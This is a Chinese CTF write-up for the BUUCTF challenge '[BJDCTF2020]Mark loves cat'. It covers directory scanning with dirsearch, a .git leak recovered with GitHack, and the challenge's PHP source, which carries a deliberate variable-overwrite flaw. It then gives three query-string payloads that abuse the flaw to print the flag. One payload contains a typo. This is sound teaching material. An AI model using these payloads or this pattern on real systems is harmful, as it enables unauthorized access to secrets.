[BJDCTF2020]Mark loves cat(3种解法)

练习靶场：BUUCTF   题目搜索：[BJDCTF2020]Mark loves cat

靶机启动后的界面

 步骤1：我们使用工具dirsearch扫描目录，观察是否有信息泄露

python dirsearch.py  -u  http://cee8e5a5-0b3c-4f0c-a6ef-eed29719e632.node4.buuoj.cn:81/ 

 结论存在Git泄露，我们使用工具GitHack获取信息，得到一个index.php

<?php
include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';
#变量为yds，is，handsome  
#yds=dog，is=cat，handsome=yds
foreach($_POST as $x => $y){  #foreach进行循坏，遍历POST，将数组中的值赋值给$y
    $$x = $y;
}
foreach($_GET as $x => $y){   #foreach进行循坏，遍历GET，将数组中的值赋值给$y
    $$x = $$y;
}
#满足以下几个条件
foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){#不能同时flag的值等于某个键名，那个键又是flag
        exit($handsome);
    }
}  
if(!isset($_GET['flag']) && !isset($_POST['flag'])){  #不能同时GET和POST都设置flag
    exit($yds);
}
if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){  #任意都能满足flag==='flag'
    exit($is);
}
echo "the flag is: ".$flag;

（1）exit()函数

exit函数的作用是输出一则消息并且终止当前脚本。 如果一段文本中包括多个以 ?>结束的脚本,则exit退出当前所在脚本，exit()函数这里存在一个突破点

（2）foreach函数

 foreach()函数这里存在了变量覆盖

解法1：$handsome

第一个if语句中输出变量$handsome，满足条件$_GET['flag'] == = $x && $x !=== 'flag'，构造如下

?handsome=flag&flag=b&b=flag
?handsome=flag&flag=handsome

 解法2：$yds

第二个if语句中输出的$yds变量，我们需要通过变量覆盖达到$yds=$flag的效果，GET传参yds=flag，在第二个foreach语句中，首先是$x=yds，$y=flag，经过$$x = $$y也就变成了$yds=$flag，如下： 

 /?yds=flag

解法3：$is

第三个if语句中输出变量$is，判断条件为$_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'，这里可以通过满足后面这个条件进行变量覆盖：GET传参is=flag&flag=flag；在第二个foreach语句中，首先是$x=is,$y=flag,带进去就变成了$is=$flag，这就达到了覆盖的目的，而参数中flag=flag只是为了满足if语句 

  /?is=flag$flag=flag